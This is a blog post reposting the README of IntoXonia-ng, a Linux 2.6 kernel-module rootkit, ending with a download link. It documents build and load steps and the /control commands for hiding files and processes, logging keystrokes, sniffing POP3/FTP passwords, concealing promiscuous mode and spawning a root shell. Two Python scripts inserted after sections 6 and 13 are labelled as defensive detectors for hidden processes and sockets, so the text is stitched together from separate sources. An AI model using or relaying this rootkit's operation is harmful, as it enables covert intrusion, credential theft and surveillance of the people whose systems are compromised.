
Thursday, 8 May 2008

Linux LKM 2.6.x Rootkit

Linux LKM Rootkit for 2.6.x Kernels

IntoXonia - LKM rootkit for Linux Kernel 2.6.x
==============================================

1. History
----------

I released the first version of IntoXonia in 2005 and got mixed replies.
The rootkit was incompatible with 64-bit architectures because the algorithm for finding the
system call table address didn't work properly :( I also found a bug in obtaining the full path to a file.
In this version I have fixed the known bugs and added new features (see ChangeLog). The method of
configuring the rootkit has IMHO changed for the better: it is still done through a fake binary,
but all the options are now categorized.
Today, 05/28/2006, is the release date of the IntoXonia-ng LKM rootkit.

2. Possibilities
----------------

(*) hiding files & directories
(*) hiding processes
(*) fake removal of files
(*) redirecting file opens
(*) redirecting directory changes
(*) prohibiting file opens
(*) prohibiting directory changes
(*) adding a fake line to a file
(*) hiding lines in a file
(*) replacing lines in a file while reading
(*) protecting a file from removal
(*) safe saving of a file before removal
(*) protecting processes
(*) making aliases for commands
(*) redirecting execution of binaries
(*) prohibiting program execution
(*) recording pressed keys (keylogger)
(*) sniffing POP3/FTP passwords
(*) loading/saving options to a file
(*) obtaining root privileges
(*) manually changing the UID/GID of a process
(*) secure file erasing
(*) configuring through a fake binary
(*) protecting the configuration with a password
(*) hiding promisc mode

3. Installation
---------------

I haven't made a configurator yet, so you have to configure the rootkit manually :) Three constants
are stored in the file option.h. The CONTROL constant contains the path to the fake binary that is
used for configuring. The PASSWORD constant contains the authorization password. After you have
edited them, you can compile and insert the module:

# make
# make load

4. Configuration
----------------

All commands are now unified :) As before, configuration is done through the fake
binary, by default /control. Before configuring you have to authorize:

# /control auth

All commands have the same syntax:

# /control <type> <+|-><command> <args>

The first parameter is the option type. There are six types of commands: fs, task, prog, log, sniff, inet.
Next comes + or -, depending on the action: adding or removing a rule. The parameter "command" names
a specific option and takes its own specific arguments, args.
Example: you can add a redirect rule with the following command:

# /control fs +link /etc/passwd /etc/passwd.old

You can remove this rule by changing just one character:

# /control fs -link /etc/passwd /etc/passwd.old

Apart from the main configuration rules a few other commands exist; they are
described later. Use "close" to end the configuration session:

# /control close

5. File access options
----------------------

All commands for file access options begin with /control fs.

Command: /control fs +hide /file
Description: This command removes /file from directory listings.
Note: "ls /file" still working is not a mistake: if you correctly enter
the full name of the file, then you already know that it is there.

Command: /control fs +remove /file
Description: This command fakes the removal of a file.
Note: use this option if you want to avoid any reference to the file.

Command: /control fs +link /file1 /file2
Description: Redirects to /file2 when /file1 is opened.
Note: to delete a rule you need to type all the parameters that were
given when adding it. Example:
/control fs -link /file1 /file2

Command: /control fs +link /dir1 /dir2
Description: Redirects to directory /dir2 when changing to directory /dir1.
Note: both directories must be typed without a trailing '/'.

Command: /control fs +deny /file
Description: Denies any access to /file.

Command: /control fs +line /file text task
Description: Adds the fake text 'text' to the end of /file, as seen
when the file is read by the program 'task'.

Command: /control fs +hline /file text
Description: Hides all lines containing 'text' in /file.

Command: /control fs +repl /file str1 str2
Description: Replaces str1 with str2 on the fly when /file is read.

Command: /control fs +protect /file
Description: Protects /file from removal.

Command: /control fs +save /file /dir/
Description: Automatically saves a copy of /file in directory /dir/ when it is removed.
Note: here you do have to type '/' at the end of the directory path :)

6. Options connected with processes
-----------------------------------

This rootkit can hide and protect processes. You can hide a process
with the following command:

# /control task +hide pid

Protecting means that sending signals to the process is prohibited:

# /control task +protect pid
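
A defender's cross-check for the process hiding described above, added here as an example that is not part of the README or of the rootkit's code. The README's own note in section 5 that `ls /file` keeps working when you know the exact name shows that hiding is applied to directory listings, not to path lookups; the same holds for `/proc`, so a PID whose `/proc/<pid>` entry can be stat()ed but which is absent from a listing of `/proc` is a candidate hidden process. The `/proc` mount point and the `pid_max` ceiling are assumptions about a standard Linux system; the listing is taken twice so that processes created during the probe are not reported as hidden.

```python
import os

PROC = "/proc"  # assumption: standard procfs mount point


def pid_max(proc=PROC):
    """Kernel PID ceiling; fall back to the classic 32768 if it cannot be read."""
    try:
        with open(os.path.join(proc, "sys/kernel/pid_max")) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return 32768


def listed_pids(proc=PROC):
    """PIDs that a directory listing of /proc reports (what ps, top and ls rely on)."""
    try:
        names = os.listdir(proc)
    except OSError:
        return set()
    return {int(name) for name in names if name.isdigit()}


def probed_pids(limit, proc=PROC):
    """PIDs found by stat()ing /proc/<pid> by name, never consulting the listing."""
    found = set()
    for pid in range(1, limit + 1):
        try:
            os.stat(os.path.join(proc, str(pid)))
        except FileNotFoundError:
            continue
        except PermissionError:
            pass  # entry exists but is not readable: still a live PID
        found.add(pid)
    return found


def hidden_pids(before, probed, after):
    """Pure comparison: PIDs reachable by path but absent from both listings.

    Requiring absence from the listing taken before AND after the probe
    suppresses PIDs that were simply created while the probe was running.
    """
    return sorted(probed - before - after)


def scan(proc=PROC, limit=None):
    before = listed_pids(proc)
    probed = probed_pids(limit or pid_max(proc), proc)
    after = listed_pids(proc)
    return hidden_pids(before, probed, after)


if __name__ == "__main__":
    for pid in scan():
        print(f"PID {pid}: /proc/{pid} exists but is missing from the /proc listing")
```

Run as root so that every `/proc/<pid>` is reachable. A hit means only that the listing and the path lookup disagree; confirm it by reading `/proc/<pid>/status` and `/proc/<pid>/cmdline` directly. A rootkit that also hooks stat() would defeat this check, so it is one signal among several, not a proof of a clean system.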

7. Options connected with executing binaries
--------------------------------------------

All commands connected with executing binaries begin with /control prog.
You can make an alias for a binary with the following command:

# /control prog +make /fake /command

Now /fake will be interpreted in the same way as /command.
Aliases are intended for executing hidden or forbidden binaries.
There is also redirection for programs:

# /control prog +link /prog1 /prog2

Now the program /prog2 will be executed instead of /prog1.
Prohibiting the execution of binaries is done with the 'deny' option:

# /control prog +deny /prog

This command will deny execution of /prog.

8. Keylogger configuration
--------------------------

The keylogger is configured with the following command:

# /control log + uid /file

The argument uid is the identifier of the user whose keyboard
input will be logged to /file.

9. Sniffer configuration
------------------------

This rootkit contains a sniffer for POP3 and FTP passwords. To view all POP3 and FTP
usernames and passwords, type the following commands:

# /control sniff +pop
# /control sniff +ftp

Captured usernames and passwords are printed with printk(), so you can
view them with the dmesg program.

10. Network configuration
-------------------------

# /control inet +promisc

Hides PROMISC mode on the interface. Use it to hide a running external sniffer
program.

11. Saving and loading options
------------------------------

All rules for files, processes, binaries, the keylogger and the sniffer may be saved to a file
and loaded the next time you start the rootkit. There are two commands for it:

# /control save /file
# /control load /file

12. Functions of immediate execution
------------------------------------

There are several commands in this category: obtaining root privileges, manually
changing the UID/GID of a process, and secure file erasing. To get root privileges, type:

# /control rootme

The result is execution of /bin/sh with root privileges.
To manually change the UID/GID of the process with PID pid, type the following commands:

# /control setuid pid uid
# /control setgid pid uid

Secure file erasure is done with the following command:

# /control erase /file

None of these functions work without authorization :)

13. Disadvantages
-----------------

IMHO, haquer has noticed that the rootkit doesn't contain the traditional possibility of hiding
netstat contents. That is realized by hiding certain lines in /proc/net/tcp and /proc/net/udp,
so IMHO it is not a disadvantage ;) But unfortunately there are some others. Firstly, the
rootkit is not compatible with 64-bit architectures. Secondly, all options are stored
in kernel space, where memory is not swapped. Although the rootkit works fine on most 2.6
kernels, the system call table cannot be found on newer ones. Some kernels Oops after the
module is unloaded. It is not critical; it happens because of the read() system call
interception. Also, I don't know whether the rootkit is compatible with X.
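
The netstat hiding just described works by filtering lines out of /proc/net/tcp and /proc/net/udp as they are read, which gives a defender a consistency check: a socket that some process holds open appears as a `socket:[inode]` link under /proc/<pid>/fd, and the same inode should be advertised by exactly one of the /proc/net tables. The script below, an added example that is not part of the README or of the rootkit's code, collects both sides and reports inodes that are referenced by an open fd but missing from every table. The inode column positions are the layouts the kernel prints for those tables; `/proc` as the mount point and the constructed `TCP_SAMPLE` text are assumptions made for this example.

```python
import os
import re

PROC = "/proc"  # assumption: standard procfs mount point

# Whitespace-separated field index of the inode column in each /proc/net table,
# as the kernel prints them (tcp/udp-style tables share one layout).
INODE_COLUMN = {
    "tcp": 9, "tcp6": 9, "udp": 9, "udp6": 9, "raw": 9, "raw6": 9, "udplite": 9,
    "unix": 6, "netlink": 9, "packet": 8,
}

SOCKET_LINK = re.compile(r"socket:\[(\d+)\]")

# Constructed sample of /proc/net/tcp output (two listening sockets, inodes 12345 and 67890).
TCP_SAMPLE = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0\n"
    "   1: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 67890 1 0000000000000000 100 0 0 10 0\n"
)


def inodes_in_table(text, column=9):
    """Parse the inode numbers out of one /proc/net table; the header line is skipped."""
    inodes = set()
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) > column and fields[column].isdigit():
            inodes.add(int(fields[column]))
    return inodes


def socket_inodes_from_fds(proc=PROC):
    """Socket inodes referenced by any process's open fds (/proc/<pid>/fd/* symlinks)."""
    inodes = set()
    try:
        names = os.listdir(proc)
    except OSError:
        return inodes
    for name in names:
        if not name.isdigit():
            continue
        fd_dir = os.path.join(proc, name, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue  # process vanished, or fd dir not readable without root
        for fd in fds:
            try:
                match = SOCKET_LINK.fullmatch(os.readlink(os.path.join(fd_dir, fd)))
            except OSError:
                continue
            if match:
                inodes.add(int(match.group(1)))
    return inodes


def advertised_inodes(proc=PROC):
    """Union of the inodes that every known /proc/net table admits to."""
    inodes = set()
    for table, column in INODE_COLUMN.items():
        try:
            with open(os.path.join(proc, "net", table)) as f:
                inodes |= inodes_in_table(f.read(), column)
        except OSError:
            continue  # table absent on this kernel (e.g. no IPv6)
    return inodes


def missing_sockets(referenced, advertised):
    """Pure comparison: sockets held open by a process but absent from every table."""
    return sorted(referenced - advertised)


def scan(proc=PROC):
    # Tables are read before and after the fd walk so a socket opened or closed
    # while the walk runs is not reported as hidden.
    first = advertised_inodes(proc)
    referenced = socket_inodes_from_fds(proc)
    second = advertised_inodes(proc)
    return missing_sockets(referenced, first | second)


if __name__ == "__main__":
    for inode in scan():
        print(f"socket inode {inode} is open in a process but absent from /proc/net/*")
```

Run it as root so that every process's fd directory is readable. A reported inode identifies the socket but not its addresses, since those are exactly what the filtered table withheld; the owning process can still be found by searching /proc/*/fd for the `socket:[inode]` link. Sockets of families not in `INODE_COLUMN` would show up as false positives, so extend the table map before trusting a hit on an unusual system.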

14. Disclaimer
--------------

This module is designed to show the possibilities of intercepting system calls in Linux.
I don't guarantee that it'll work without bugs. The author takes no responsibility for the use
of this program in improper ways.

15. Greetingz
-------------

WildCat - translation
EH0T, Vishnyaaa - translation
Roneon - moral support, ideas
Elena Arishina - moral support
DarkEagle - introducing me to scene :)
Dpoke Wizard - first user :)
Victor Makarov - hacking, testing
ShadOS - hacking, testing
Kolya aka prox - testing
Oberon - testing
DJ KolbasoID - cool trance
DJ Tiesto - cool trance also :)
THC - information
OpenNet.ru - information
Linux.Org.Ru - information (+ help on forum)
SecurityLab.ru - information (+ thanx for prize on competition :))
Vitaly Zaicev - hosting

And great thanx to my beloved girl Lika for the fact that she exists :)
And thanx to you, c001_H4ck3r, for reading this trash all the way to the end :)

You can communicate with me using e-mail: xdiman [at] mail [dot] ru

Project home site: http://satanic.easycoding.org

28-05-2006 5:28
_4epen aka Self Assured Addict %)

+++++++++++++++++++++++++++++++++++
From ShadOS

Download From Here ->> http://backdoored.net/intoxonia-ng2[1].tar.gz

